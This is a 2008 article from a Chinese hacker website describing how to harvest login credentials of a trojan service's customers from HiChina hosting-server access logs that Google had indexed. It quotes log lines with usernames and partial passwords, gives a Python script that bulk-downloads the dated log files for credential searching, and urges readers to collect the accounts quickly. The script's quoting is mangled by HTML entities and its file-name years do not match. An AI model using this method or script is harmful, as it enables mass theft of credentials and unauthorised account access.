黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 黑客入侵 >> 正文
·万网虚拟机漏洞,拿某VI06-22·跨站脚本漏洞导致的浏览06-22
·Yahoo! 统计功能跨站脚本06-22·解决IE浏览器“不适” 让06-22
·怕忘掉Vista密码?再谈U06-22·PurgeHosting提供250-1G06-22
·Windows Vista有趣标签S06-20·Windows Vista操作系统快06-20
·低配又如何?“老爷机”照06-20·删除Windows XP下顽固文06-20
·无忧无虑提供500M免费PH06-20·修改Vista最近打开的项目06-19
·系统重装导致NTFS无法访06-19·1vyb.com提供250M免费ph06-19
·Coppermine Photo Galle06-18·用XP的启动管理来搞定Vi06-18
·Vista下IE7.0浏览器九个06-18·不费吹灰之力 速将超大文06-18
·揭秘:Vista用户名和密码06-18·265网络硬盘送500兆www.06-18
·hostshield.com提供200M06-18·详解WINRAR的自解压跨站06-17
·阿里网络硬盘免费用户5006-17·webs28提供1000M免费php06-17
·全面教你动手制作Vista和06-16·猫扑网盘,好网盘选猫扑w06-16
·天禧免费动态空间06-16·妙招让漏洞变陷阱来折磨06-14
[推荐]万网虚拟机漏洞,拿某VIP木马所有会员
        ★★★★★

万网虚拟机漏洞,拿某VIP木马所有会员

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-6-22 11:28:49

昨天群里看到某牛发布某VIP木马所有VIP用户的数据库。。。

想起来偶以前拿了另一个VIP马过程,心里痒痒,打算试试。

上次拿了那个VIP马会员用了WHOIS拿的,不小心公布了出去,结果木马作者直接重新生成了所有用户。

经验教训,这次拿到了绝对不能公布。

这次的VIP验证和灰鸽子的大同小异,都是把用户名密码扔到验证服务器,验证后下载服务端。

所以会发送用户名密码出去。

监听本地通讯,得到地址:http://xxx/ip/20071125xxxx.asp?user=kxlzx&pass=kanhenmekan!&version=1.0

如果验证成功,返回一个EXE文件。

可以得到信息:
1,HTTP协议
2,GET方式提交数据

GET数据也就是说,IIS会把日志记录下来,日志里会有密码。。。

类似于:
20080126-00:47:40 66.249.xxx 200 http://xxx/ip/20071125xxxx.asp user=kxlzx&pass=kanhenmekan!&version=1.0

20080126-00:54:02 66.249.xxx 500 http://xxx/check.asp |-|ASP_0113|脚本超时 181578

当然之前并不知道居然能拿到日志。

获取了验证文件地址后,在google搜索该木马的域名,居然搜到了万网的日志记录。。。。无语。。。

注意记录的格式:

20080218-00:41:05 124.132xxx 200 http://www.xxx …… 218.19xxx 200 http://www.xxx/ip/20071026Psxxx.asp user=jeffrey8273&pass=fedoracore…
cn-22.hichina.com/asplog/log20080218.txt - 38k - 网页快照 - 类似网页

20080220-00:37:26 194.110xxx 200 http://www.xxx…… http://www.xxx/ip/20071026xx.asp user=kalaam&pass=ne
|-|ASP_0113|脚本超时107125 …
cn-22.hichina.com/asplog/log20080220.txt - 38k - 网页快照 - 类似网页

这里:cn-22.hichina.com/asplog/log20080220.txt
cn-22.hichina.com是万网的服务器,log20080220.txt 是日志地址。
明明验证的服务器不再万网,这个日志为什么记录了vip木马的用户呢?

推测是这样的,该VIP用户验证服务器曾经放在万网,被记录下来了。而万网有着良好的保存日志习惯。

既然里面有VIP用户,就不客气了,python写了个脚本,抓他们。
import urllib
month=1
while(month<7):
day=0
while(day<32):
tmp = ”+str(month)+str(day)
if (len(tmp)==2):
tmp = str(month)+tmp
strtmp = ‘http://cn-22.hichina.com/asplog/log20070&#39;+tmp+&#39;.txt&#39;
sock = urllib.urlopen(strtmp)
htmlSource = sock.read()
sock.close()
strpath = ‘log20080′+tmp+’.txt’
f = file(strpath, ‘w’)
f.write(htmlSource)
f.close()
day=day+1

print tmp
month = month+1

PS: 抓到后,按照原来的文件名保存下来。其实也可以用迅雷抓,为什么要用python呢?
-_-!这不刚学了python,显摆么。。。。

抓下来的文件,拿editplus搜索该域名,得到了N多用户名密码。就不抓图了,免得某些人转载的时候说咱写的东西图太多。。。

运气好的哥们儿速度抓撒,能拿到了也别传啊。。。

文章录入:cainiaowang    责任编辑:xinlian 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886